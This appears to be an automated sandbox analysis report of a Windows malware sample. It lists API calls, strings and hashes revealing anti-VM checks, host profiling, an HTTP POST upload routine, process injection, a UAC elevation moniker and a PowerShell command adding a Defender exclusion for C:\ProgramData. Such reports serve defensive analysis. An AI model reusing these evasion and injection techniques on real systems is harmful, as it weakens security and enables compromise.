Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: 3ba175d04a56f20a998998f20e04ea1438df5283fd10f9289b3dac538007e990
Instruction ID: ce94d4356af95896a48c352e525e45e67b8f71c17836ad8e2b892aa268f5a4ac
Opcode Fuzzy Hash: 3ba175d04a56f20a998998f20e04ea1438df5283fd10f9289b3dac538007e990
Instruction Fuzzy Hash: B6D10774E00219EFDB18CF98E890AFDB7B6FF88304F148159E516AB395D735A981CB60

Function 00BD9240 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32 ref: 00BD9246
ExitProcess.KERNEL32 ref: 00BD92EE

Part of subcall function 00BD89F0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00BD8A2E
Part of subcall function 00BD89F0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 00BD8A4D
Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,VMWare), ref: 00BD8A63
Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00BD8A79
Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,Red Hat), ref: 00BD8A8F
Part of subcall function 00BD89F0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00BD8AA4
Part of subcall function 00BD89F0: GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8AAF
Part of subcall function 00BD89F0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD8AC3
Part of subcall function 00BD89F0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD8ACD
Part of subcall function 00BD89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00BD8AF9
Part of subcall function 00BD89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00BD8B0C
Part of subcall function 00BD89F0: GetFileAttributesW.KERNELBASE(?), ref: 00BD8B1B
Part of subcall function 00BD89F0: GetFileAttributesW.KERNEL32(?), ref: 00BD8B2D

Part of subcall function 00BD8710: InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732
Part of subcall function 00BD8710: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
Part of subcall function 00BD8710: StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
Part of subcall function 00BD8710: wsprintfA.USER32 ref: 00BD87CF
Part of subcall function 00BD8710: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
Part of subcall function 00BD8710: GetLastError.KERNEL32 ref: 00BD87EE
Part of subcall function 00BD8710: WSAStartup.WS2_32(00000202,?), ref: 00BD882C
Part of subcall function 00BD8710: CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
Part of subcall function 00BD8710: CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861

Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,00BD92D8), ref: 00BD7306
Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,00BD92D8), ref: 00BD7319
Part of subcall function 00BD72E0: lstrlenW.KERNEL32(?,?,?,?,00BD92D8), ref: 00BD7322
Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,00BD92D8), ref: 00BD733D
Part of subcall function 00BD72E0: GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,00BD92D8), ref: 00BD734B
Part of subcall function 00BD72E0: GetLastError.KERNEL32(?,?,?,00BD92D8), ref: 00BD7355
Part of subcall function 00BD72E0: wnsprintfW.SHLWAPI ref: 00BD7377
Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD738F
Part of subcall function 00BD72E0: wnsprintfW.SHLWAPI ref: 00BD73A9
Part of subcall function 00BD72E0: SetFileAttributesW.KERNEL32(?,00000006), ref: 00BD73C5
Part of subcall function 00BD72E0: lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 00BD73D7
Part of subcall function 00BD72E0: GetUserNameW.ADVAPI32(?,?), ref: 00BD73F6
Part of subcall function 00BD72E0: NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 00BD740B
Part of subcall function 00BD72E0: NetApiBufferFree.NETAPI32(00000000), ref: 00BD7420
Part of subcall function 00BD72E0: CoInitializeEx.OLE32(00000000,?), ref: 00BD7437
Part of subcall function 00BD72E0: lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00BD7451

Part of subcall function 00BD93A0: CryptGenRandom.ADVAPI32(00000020,?), ref: 00BD93B8
Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9415
Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD941C
Part of subcall function 00BD93A0: wsprintfA.USER32 ref: 00BD944F
Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9488
Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD948B
Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9490
Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD9493

Part of subcall function 00BD7920: LsaOpenPolicy.ADVAPI32(00000000,00BDA060,00000001,?), ref: 00BD795C
Part of subcall function 00BD7920: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00BD7975
Part of subcall function 00BD7920: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD7991
Part of subcall function 00BD7920: HeapAlloc.KERNEL32(00000000), ref: 00BD7994
Part of subcall function 00BD7920: LsaFreeMemory.ADVAPI32(?), ref: 00BD79DB
Part of subcall function 00BD7920: LsaClose.ADVAPI32(?), ref: 00BD79E4
Part of subcall function 00BD7920: GetComputerNameW.KERNEL32(?,?), ref: 00BD7A00
Part of subcall function 00BD7920: GetUserNameW.ADVAPI32(?,00000101), ref: 00BD7A11
Part of subcall function 00BD7920: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A32

Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00BD8921
Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00BD8934
Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8947
Part of subcall function 00BD8900: GetFileAttributesW.KERNEL32(?), ref: 00BD896D
Part of subcall function 00BD8900: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00BD899D
Part of subcall function 00BD8900: wnsprintfW.SHLWAPI ref: 00BD89C0
Part of subcall function 00BD8900: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00BD89E2

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Heap$FreeProcess$AttributesFileUser$CryptNamewnsprintf$AcquireAddressContextDevicesDisplayEnumErrorInformationInitializeLastPolicyProclstrcpylstrlenwsprintf$AllocBufferByteCharCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInfoLangMemoryModuleMultiMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWideWow64
String ID:
API String ID: 1026145915-0
Opcode ID: ec4ef6b50f4303f4b6b980021cff946776d6c2af064be468172ac68bbee58fb9
Instruction ID: 03f47155000c0c28fb34539f95ac1250a0a30b76fe8f92a2e64b65c73bded6d2
Opcode Fuzzy Hash: ec4ef6b50f4303f4b6b980021cff946776d6c2af064be468172ac68bbee58fb9
Instruction Fuzzy Hash: 9A012B5C60610266DE38F5D944A53B4B1CADF81321FD851AB6BD647FC5BD081E83825F

Function 00D11710 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D11110: GetModuleHandleA.KERNEL32(kernel32), ref: 00D1111B
Part of subcall function 00D11110: GetModuleHandleW.KERNEL32(00000000), ref: 00D11162

GetUserDefaultLCID.KERNELBASE ref: 00D1182C

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$DefaultUser
String ID:
API String ID: 3008646163-0
Opcode ID: 2900884e824874af4ac5aca7dc89f02db9d6c0994840a8cd38df721c82e5c995
Instruction ID: a48a4d36f349d73448d2f1a0426798b61b47a93bf0712c692d9d6f566ba017ea
Opcode Fuzzy Hash: 2900884e824874af4ac5aca7dc89f02db9d6c0994840a8cd38df721c82e5c995
Instruction Fuzzy Hash: 52410AB9D00209AFDB04DFA8E485AEEB7F5FF48304F148559E515A7341DB34AA84CFA1

Function 00D13C60 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00D13C91
GetLastError.KERNEL32 ref: 00D13C9B
ExitProcess.KERNEL32 ref: 00D13CA8
BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00D13CB8
GetCurrentProcess.KERNEL32(00000000), ref: 00D13CC4
TerminateProcess.KERNEL32(00000000), ref: 00D13CCB

Strings

eruigoreh ertoerh634643, xrefs: 00D13CB3

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
String ID: eruigoreh ertoerh634643
API String ID: 3772419538-1078997068
Opcode ID: 6d14d3b8939c8567799a536713d880f087071333bfa2e63bc83ffad4df1999be
Instruction ID: 057f80f8e0a1905ef5297e9959ea647e4d2511c21ed92e280f08e426cc8f7d0f
Opcode Fuzzy Hash: 6d14d3b8939c8567799a536713d880f087071333bfa2e63bc83ffad4df1999be
Instruction Fuzzy Hash: BB016D70A40308BBD720EFB1AE0AB9E7BB4EB18B01F104415F506E6290EF749A45DB71

Non-executed Functions

Function 00BD5FD0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 00BD5FED
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00BD6001
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00BD600C
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00BD6017
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00BD6022
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00BD602D
GetTempPathW.KERNEL32(000000F6,?), ref: 00BD6046

Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2

wnsprintfW.SHLWAPI ref: 00BD6081
PathCombineW.SHLWAPI(?,?,?), ref: 00BD609B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00BD60C2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BD60E6
SetEndOfFile.KERNEL32(00000000), ref: 00BD60E9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD60F6
wnsprintfW.SHLWAPI ref: 00BD6114
RtlInitUnicodeString.NTDLL(?,?), ref: 00BD612A
RtlInitUnicodeString.NTDLL(?,?), ref: 00BD6137
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 00BD6176
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD61C5
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 00BD620F
FlushFileBuffers.KERNEL32(00000000), ref: 00BD6217
SetEndOfFile.KERNEL32(00000000), ref: 00BD621E
NtQueryInformationProcess.NTDLL ref: 00BD6233
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00BD625B
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00BD62B2
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BD62EE
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00BD62FC
NtClose.NTDLL ref: 00BD6335
NtClose.NTDLL ref: 00BD6346
NtClose.NTDLL ref: 00BD6350
CloseHandle.KERNEL32(00000000), ref: 00BD6353

Strings

NtCreateThreadEx, xrefs: 00BD6024
"%s", xrefs: 00BD6103
NtCreateProcessEx, xrefs: 00BD6003
RtlDestroyProcessParameters, xrefs: 00BD6019
RtlCreateProcessParametersEx, xrefs: 00BD600E
NtCreateSection, xrefs: 00BD5FFB
%08x%s, xrefs: 00BD6070
.exe, xrefs: 00BD605F
ntdll, xrefs: 00BD5FE5

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: 5482271ca9973384a83eff15af9e15fc615c676c84066892b3199eab6ac5de15
Instruction ID: c1beede4e7eca7061b033e33235df967e765822645de25f42ad7c476c039a22f
Opcode Fuzzy Hash: 5482271ca9973384a83eff15af9e15fc615c676c84066892b3199eab6ac5de15
Instruction Fuzzy Hash: 42B12D71A40219BBEB10DBA4CC49FAEBBBCFB04710F1444A6F605F7290EB74A9448F54

Function 00BD6830 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 229
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,00BD9478), ref: 00BD6852
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD6872
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BD688B
HeapAlloc.KERNEL32(00000000), ref: 00BD6892
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD68B3
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD68D8
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00BD691B
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6938
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00BD6971
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BD699A
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 00BD69B4
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,0000EA60), ref: 00BD69C8
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 00BD69E4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BD69FA
HeapAlloc.KERNEL32(00000000), ref: 00BD6A01
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00BD6A0C
HeapReAlloc.KERNEL32(00000000), ref: 00BD6A13
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00BD6A27
InternetCloseHandle.WININET(00000000), ref: 00BD6A49
InternetCloseHandle.WININET(00000000), ref: 00BD6A54
InternetCloseHandle.WININET(00000000), ref: 00BD6A5A
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6A8D
HeapFree.KERNEL32(00000000), ref: 00BD6A90
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6A9C
HeapFree.KERNEL32(00000000), ref: 00BD6A9F
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6AAB
HeapFree.KERNEL32(00000000), ref: 00BD6AAE

Strings

Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 00BD69C2
`, xrefs: 00BD68EB
POST, xrefs: 00BD696B

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 7e09efd76dc77dd270693951a5d0147e7ac3c7489c1add6e5e2899702edc868e
Instruction ID: 4f718a3d813d77888eea0cabd4e0b05a62a9850da4953856c9da80384914a5b7
Opcode Fuzzy Hash: 7e09efd76dc77dd270693951a5d0147e7ac3c7489c1add6e5e2899702edc868e
Instruction Fuzzy Hash: 4A716275A41219BBEB109FA4CC95FAEFBBCEF08700F15405BFA15B7290EB7499008B64

Function 00BD7920 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,00BDA060,00000001,?), ref: 00BD795C
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00BD7975
GetProcessHeap.KERNEL32(00000008,?), ref: 00BD7991
HeapAlloc.KERNEL32(00000000), ref: 00BD7994
LsaFreeMemory.ADVAPI32(?), ref: 00BD79DB
LsaClose.ADVAPI32(?), ref: 00BD79E4
GetComputerNameW.KERNEL32(?,?), ref: 00BD7A00
GetUserNameW.ADVAPI32(?,00000101), ref: 00BD7A11
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A32
GetProcessHeap.KERNEL32(00000008,00000001), ref: 00BD7A48
HeapAlloc.KERNEL32(00000000), ref: 00BD7A4B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00BD7A75
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A97
GetProcessHeap.KERNEL32(00000008,00000001), ref: 00BD7AAD
HeapAlloc.KERNEL32(00000000), ref: 00BD7AB0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00BD7AD5
wsprintfA.USER32 ref: 00BD7B56
wsprintfA.USER32 ref: 00BD7B81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD7BDA
HeapFree.KERNEL32(00000000), ref: 00BD7BDD
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD7BE9
HeapFree.KERNEL32(00000000), ref: 00BD7BEC
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD7BF8
HeapFree.KERNEL32(00000000), ref: 00BD7BFB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD7C04
HeapFree.KERNEL32(00000000), ref: 00BD7C07

Strings

%s|%d.%d (%d)|%s|%s|%S, xrefs: 00BD7B7B
%d|%s|%.16s|, xrefs: 00BD7B50
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00BD7AE2

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 4008773985-1210213088
Opcode ID: 3327f1b8206c54506c26cf191ed7964985b85114d761a38c4736159f428815f6
Instruction ID: beb0238706329931498992546fd7dd965b30e66ebe9052125aeae1506d197699
Opcode Fuzzy Hash: 3327f1b8206c54506c26cf191ed7964985b85114d761a38c4736159f428815f6
Instruction Fuzzy Hash: C8919C71A44309AEEB209BA58C55FEEFBB9EF44700F1540A7EA14E7290FF709941CB60

Function 00BD94A0 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 192
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,76CF0EE0,?), ref: 00BD94BC
GetProcAddress.KERNEL32(00000000), ref: 00BD94C5
GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 00BD94D4
GetProcAddress.KERNEL32(00000000), ref: 00BD94D7
GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 00BD94E6
GetProcAddress.KERNEL32(00000000), ref: 00BD94E9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 00BD94F8
GetProcAddress.KERNEL32(00000000), ref: 00BD94FB
GetCurrentProcessId.KERNEL32 ref: 00BD9529
OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00BD9537
ReadProcessMemory.KERNEL32(00000000,?,00BD7434,00000004,00000000), ref: 00BD9568
ReadProcessMemory.KERNEL32(00000000,00BD7428,?,00000004,00000000), ref: 00BD9582
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00BD9598
StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 00BD95AF
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00BD95C3
lstrcpyW.KERNEL32(00000000,?), ref: 00BD95D4
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00BD9611
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00BD963D
ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 00BD965C
CloseHandle.KERNEL32(00000000), ref: 00BD969F
StrCmpIW.SHLWAPI(?,?), ref: 00BD96B3

Strings

RtlLeaveCriticalSection, xrefs: 00BD94D9
\explorer.exe, xrefs: 00BD95A3
NtQueryInformationProcess, xrefs: 00BD94B2
explorer.exe, xrefs: 00BD95F5, 00BD968A
ntdll.dll, xrefs: 00BD94B7, 00BD94CC, 00BD94DE, 00BD94F0
RtlEnterCriticalSection, xrefs: 00BD94C7
RtlInitUnicodeString, xrefs: 00BD94EB

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
String ID: NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
API String ID: 2609293587-3346233597
Opcode ID: c019915840889e83c9f2d7ae0e81dcd733d0adef450ffaf947a532714a7040bd
Instruction ID: 93d517ba473a540545f667ab406d52446f54e0fe7ab369d3a684d4304a85e471
Opcode Fuzzy Hash: c019915840889e83c9f2d7ae0e81dcd733d0adef450ffaf947a532714a7040bd
Instruction Fuzzy Hash: 11614F75A40209ABDB10DBA4CC49F9EFBB8EF48710F110596F614E72A4EB74EA41CF64

Function 00BD72E0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,00BD92D8), ref: 00BD7306
ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,00BD92D8), ref: 00BD7319
lstrlenW.KERNEL32(?,?,?,?,00BD92D8), ref: 00BD7322
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,00BD92D8), ref: 00BD733D
GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,00BD92D8), ref: 00BD734B
GetLastError.KERNEL32(?,?,?,00BD92D8), ref: 00BD7355
wnsprintfW.SHLWAPI ref: 00BD7377
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD738F
wnsprintfW.SHLWAPI ref: 00BD73A9
SetFileAttributesW.KERNEL32(?,00000006), ref: 00BD73C5
lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 00BD73D7
GetUserNameW.ADVAPI32(?,?), ref: 00BD73F6
NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 00BD740B
NetApiBufferFree.NETAPI32(00000000), ref: 00BD7420
CoInitializeEx.OLE32(00000000,?), ref: 00BD7437
lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00BD7451
wsprintfW.USER32 ref: 00BD748E
CoGetObject.OLE32(?,?,00BD2530,00000000), ref: 00BD74AB
CoUninitialize.OLE32 ref: 00BD74EB

Strings

%ProgramFiles%, xrefs: 00BD7338
%%ProgramData%%\r%Sr.js, xrefs: 00BD736C
%ComSpec%, xrefs: 00BD7301
/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'", xrefs: 00BD73CB
%ProgramW6432%, xrefs: 00BD7314
"%s", xrefs: 00BD7398
$, xrefs: 00BD747A
Elevation:Administrator!new:%s, xrefs: 00BD7481
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00BD743D, 00BD746F

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

